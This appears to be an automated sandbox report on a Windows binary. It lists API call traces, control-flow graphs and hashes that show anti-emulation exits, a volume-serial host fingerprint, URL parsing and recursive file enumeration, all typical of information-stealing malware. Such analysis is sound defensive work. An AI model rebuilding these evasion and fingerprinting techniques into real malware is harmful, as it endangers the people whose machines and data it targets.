                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCF59E
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FCF61C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCF64C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCF69A
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FCF718
                                  • lstrlen.KERNEL32(01B98F68), ref: 00FCF746
                                  • lstrcpy.KERNEL32(00000000,01B98F68), ref: 00FCF771
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCF793
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCF7E4
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FCFA32
                                  • lstrlen.KERNEL32(01B98F78), ref: 00FCFA60
                                  • lstrcpy.KERNEL32(00000000,01B98F78), ref: 00FCFA8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCFAAD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCFAFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: 40e459476420e9e4b678e67701e10f16c0ce1e903719cc252cb7e9e15aab968d
                                  • Instruction ID: cfba8451912fd6bf03d8441a06dd989daa6792d480dd42ad8885e147544190e5
                                  • Opcode Fuzzy Hash: 40e459476420e9e4b678e67701e10f16c0ce1e903719cc252cb7e9e15aab968d
                                  • Instruction Fuzzy Hash: 1BF13B30A01206CFDB28CFA9C645B59F7E6BF44324B1980BED4199B355D736DC8AEB40

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2721 fc8ca0-fc8cc4 StrCmpCA 2722 fc8ccd-fc8ce6 2721->2722 2723 fc8cc6-fc8cc7 ExitProcess 2721->2723 2725 fc8cec-fc8cf1 2722->2725 2726 fc8ee2-fc8eef call fb2a20 2722->2726 2727 fc8cf6-fc8cf9 2725->2727 2729 fc8cff 2727->2729 2730 fc8ec3-fc8edc 2727->2730 2732 fc8dbd-fc8dcb StrCmpCA 2729->2732 2733 fc8ddd-fc8deb StrCmpCA 2729->2733 2734 fc8dfd-fc8e0b StrCmpCA 2729->2734 2735 fc8e1d-fc8e2b StrCmpCA 2729->2735 2736 fc8e3d-fc8e4b StrCmpCA 2729->2736 2737 fc8d5a-fc8d69 lstrlen 2729->2737 2738 fc8e56-fc8e64 StrCmpCA 2729->2738 2739 fc8d30-fc8d3f lstrlen 2729->2739 2740 fc8e6f-fc8e7d StrCmpCA 2729->2740 2741 fc8e88-fc8e9a lstrlen 2729->2741 2742 fc8d84-fc8d92 StrCmpCA 2729->2742 2743 fc8da4-fc8db8 StrCmpCA 2729->2743 2744 fc8d06-fc8d15 lstrlen 2729->2744 2730->2726 2770 fc8cf3 2730->2770 2732->2730 2761 fc8dd1-fc8dd8 2732->2761 2733->2730 2745 fc8df1-fc8df8 2733->2745 2734->2730 2746 fc8e11-fc8e18 2734->2746 2735->2730 2747 fc8e31-fc8e38 2735->2747 2736->2730 2748 fc8e4d-fc8e54 2736->2748 2757 fc8d6b-fc8d70 call fb2a20 2737->2757 2758 fc8d73-fc8d7f call fb2930 2737->2758 2738->2730 2751 fc8e66-fc8e6d 2738->2751 2755 fc8d49-fc8d55 call fb2930 2739->2755 2756 fc8d41-fc8d46 call fb2a20 2739->2756 2740->2730 2752 fc8e7f-fc8e86 2740->2752 2753 fc8e9c-fc8ea1 call fb2a20 2741->2753 2754 fc8ea4-fc8eb0 call fb2930 2741->2754 2742->2730 2760 fc8d98-fc8d9f 2742->2760 2743->2730 2749 fc8d1f-fc8d2b call fb2930 2744->2749 2750 fc8d17-fc8d1c call fb2a20 2744->2750 2745->2730 2746->2730 2747->2730 2748->2730 2779 fc8eb3-fc8eb5 2749->2779 2750->2749 2751->2730 2752->2730 2753->2754 2754->2779 2755->2779 2756->2755 2757->2758 2758->2779 2760->2730 2761->2730 2770->2727 2779->2730 2780 fc8eb7-fc8eb9 2779->2780 2780->2730 2781 fc8ebb-fc8ebd lstrcpy 2780->2781 2781->2730
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: cb448270bcff1761e3f72c963b0fc81993d857d98f6a53e1c61ad17c83a6363e
                                  • Instruction ID: b15bf64f94ea8624947405ddb9ad58360bf735a7cbdeed1bfce7c68f07a15dfd
                                  • Opcode Fuzzy Hash: cb448270bcff1761e3f72c963b0fc81993d857d98f6a53e1c61ad17c83a6363e
                                  • Instruction Fuzzy Hash: 35519D71A047469BC720AFF6DA86F6B7BF8BB04744B10086DE452D7600DB78E482BB21

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2782 fd2740-fd2783 GetWindowsDirectoryA 2783 fd278c-fd27ea GetVolumeInformationA 2782->2783 2784 fd2785 2782->2784 2785 fd27ec-fd27f2 2783->2785 2784->2783 2786 fd2809-fd2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 fd27f4-fd2807 2785->2787 2788 fd2826-fd2844 wsprintfA 2786->2788 2789 fd2822-fd2824 2786->2789 2787->2785 2790 fd285b-fd2872 call fd71e0 2788->2790 2789->2790
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00FD277B
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FC93B6,00000000,00000000,00000000,00000000), ref: 00FD27AC
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FD280F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD2816
                                  • wsprintfA.USER32 ref: 00FD283B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                  • String ID: :\$C
                                  • API String ID: 2572753744-3309953409
                                  • Opcode ID: d632d1fd5bfa2b8c25c445cf42696fcc4e352699605d4ac31692d18fa5d18011
                                  • Instruction ID: 574ab46c49892d268f183085f9b3583ad3d34b2fdb5c68c91b086fa4c3617f46
                                  • Opcode Fuzzy Hash: d632d1fd5bfa2b8c25c445cf42696fcc4e352699605d4ac31692d18fa5d18011
                                  • Instruction Fuzzy Hash: C93172B1D082099BCB14CFF88A85AEFFFBDEF58710F14016AE515F7644E2348A408BA1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2793 fb4bc0-fb4bce 2794 fb4bd0-fb4bd5 2793->2794 2794->2794 2795 fb4bd7-fb4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call fb2a20 2794->2795
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00FB4BF7
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00FB4C01
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00FB4C0B
                                  • lstrlen.KERNEL32(?,00000000,?), ref: 00FB4C1F
                                  • InternetCrackUrlA.WININET(?,00000000), ref: 00FB4C27
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: 65e33435c4c3da59c7f2f61bf22326a9981c801c7a8ea4a3115ce37943e450d0
                                  • Instruction ID: 3158eb38d46e47041d02c1875b9bf4b7f45a3a165626955ce47b1bdd04b6fd85
                                  • Opcode Fuzzy Hash: 65e33435c4c3da59c7f2f61bf22326a9981c801c7a8ea4a3115ce37943e450d0
                                  • Instruction Fuzzy Hash: 5E012D71D00218ABDB14DFA9E845B9EBBF8EB48320F008166F914E7390DB7459048FD5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2798 fb1030-fb1055 GetCurrentProcess VirtualAllocExNuma 2799 fb105e-fb107b VirtualAlloc 2798->2799 2800 fb1057-fb1058 ExitProcess 2798->2800 2801 fb107d-fb1080 2799->2801 2802 fb1082-fb1088 2799->2802 2801->2802 2803 fb108a-fb10ab VirtualFree 2802->2803 2804 fb10b1-fb10b6 2802->2804 2803->2804
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB1046
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB104D
                                  • ExitProcess.KERNEL32 ref: 00FB1058
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FB106C
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00FB10AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                  • String ID:
                                  • API String ID: 3477276466-0
                                  • Opcode ID: 34724c8c018cb20f8a406b362e48f901f70d3e6040b1980e52f0fdcacfbaa13c
                                  • Instruction ID: f6c77e88ec74e036be984ad6b3968062d7a64421e4ec2338d99b2c918665eaa6
                                  • Opcode Fuzzy Hash: 34724c8c018cb20f8a406b362e48f901f70d3e6040b1980e52f0fdcacfbaa13c
                                  • Instruction Fuzzy Hash: DE01F9717402087BE73456E56C59F9B7BEDB744B15F604424F704EB2C0D971E9409A64

                                   Control-flow Graph (function at 00FCEE90; graph image and executed/not-executed colouring not reproduced in this extraction)
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCEEC3
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FCEEDE
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 00FCEF3F
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: ERROR
                                  • API String ID: 3722407311-2861137601
                                  • Opcode ID: ae2f2c44cfafb5528a29a75ad98603bd71f7646317eaf313597dd88cd9e07b28
                                  • Instruction ID: ec3859cf6ff00162e3e92d5f2a01f24aab7494e0fccc5abc6c90c1c1c5e9cb08
                                  • Opcode Fuzzy Hash: ae2f2c44cfafb5528a29a75ad98603bd71f7646317eaf313597dd88cd9e07b28
                                  • Instruction Fuzzy Hash: A8210371A202465BCB65FF7ADD46BDA37A8AF10314F04542CB84ADB242DB38E844BB90

                                   Control-flow Graph (function at 00FB10C0; graph image and executed/not-executed colouring not reproduced in this extraction)
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 1f81ad1cb16e2fc8e8aad60c250188a9875f0030b35be35bee8d0932723d41e9
                                  • Instruction ID: e95e0156f1222d1bf00f8da263843405dc36fbc3b20f4712a45f23f88abd5f5b
                                  • Opcode Fuzzy Hash: 1f81ad1cb16e2fc8e8aad60c250188a9875f0030b35be35bee8d0932723d41e9
                                  • Instruction Fuzzy Hash: 36F02E7060824C47F71479AAD82535DF7DCFB003A0F900539DEA6C2180E230C850AA27

                                   Control-flow Graph (function at 00FC8C88; graph image and executed/not-executed colouring not reproduced in this extraction)
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 688b9e46a173a2d1c8cbcd75cda644d7680da76d79afe36909689607ad524be9
                                  • Instruction ID: a0a3eb2d3ed911b2fa71615164fb0333a608633f5c5663207a0df92ec463bfc7
                                  • Opcode Fuzzy Hash: 688b9e46a173a2d1c8cbcd75cda644d7680da76d79afe36909689607ad524be9
                                  • Instruction Fuzzy Hash: 68E0D825018389BBCB3897F68C9DDC37F9D8F44200B450429A6014B640E930DC46C36A
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC23D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC23F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC2402
                                  • lstrlen.KERNEL32(\*.*), ref: 00FC240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00FC2436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC2486
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: 1c3c083583d69e093e9c72d67e344620bad40c38df888fa8ad99d133eb4737f8
                                  • Instruction ID: eb71dcef7aeb50056d7cf7147554b617b07d2b7266f1f21c9968953792ac0fb5
                                  • Opcode Fuzzy Hash: 1c3c083583d69e093e9c72d67e344620bad40c38df888fa8ad99d133eb4737f8
                                  • Instruction Fuzzy Hash: 2DA29D31D0021A9BDB65EFB5CD8AFAE77B9EF44714F044028B819A7245DB38DD41AFA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB16E2
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB1719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB176C
                                  • lstrcat.KERNEL32(00000000), ref: 00FB1776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB17A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB17EF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB17F9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1825
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1875
                                  • lstrcat.KERNEL32(00000000), ref: 00FB187F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB18AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB18F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB18FE
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1909
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1929
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1935
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB195B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1966
                                  • lstrlen.KERNEL32(\*.*), ref: 00FB1971
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB198E
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00FB199A
                                    • Part of subcall function 00FD4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00FD406D
                                    • Part of subcall function 00FD4040: lstrcpy.KERNEL32(00000000,?), ref: 00FD40A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB19C3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1A0E
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1A16
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1A21
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1A41
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1A4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1A76
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1A81
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1AAC
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1AB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1ADE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1AE9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1B11
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FB1B45
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FB1B70
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FB1B8A
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB1BC4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1BFB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1C03
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1C0E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1C31
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1C3D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1C69
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1C74
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1C7F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1CA2
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1CAE
                                  • lstrlen.KERNEL32(?), ref: 00FB1CBB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1CDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB1CE9
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1CF4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1D14
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1D20
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1D46
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1D51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1D7D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1DE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1DEB
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1DF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1E19
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1E25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1E4B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1E56
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1E61
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1E81
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1E8D
                                  • lstrlen.KERNEL32(?), ref: 00FB1E9A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1EBA
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB1EC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1EF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1F3E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FB1F45
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB1F9F
                                  • lstrlen.KERNEL32(01B991C8), ref: 00FB1FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB1FE3
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB200E
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB2042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB204D
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB2058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2075
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB2081
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                  • String ID: \*.*
                                  • API String ID: 4127656590-1173974218
                                  • Opcode ID: 76322892e93d666e44da9eeb444637abdc1019ba82ed66e626a0aad31b399018
                                  • Instruction ID: 6517185ba3955270f45e3b6e046031ba7395f1fcb8d5fac2cda4bf27df9c1fa9
                                  • Opcode Fuzzy Hash: 76322892e93d666e44da9eeb444637abdc1019ba82ed66e626a0aad31b399018
                                  • Instruction Fuzzy Hash: 1292AE31D1121A9BDB61EFA6DC88AEE77B9BF44714F440124F819AB205DB38DD41EFA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDBEF
                                  • lstrlen.KERNEL32(00FE4CA8), ref: 00FBDBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDC17
                                  • lstrcat.KERNEL32(00000000,00FE4CA8), ref: 00FBDC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDC4C
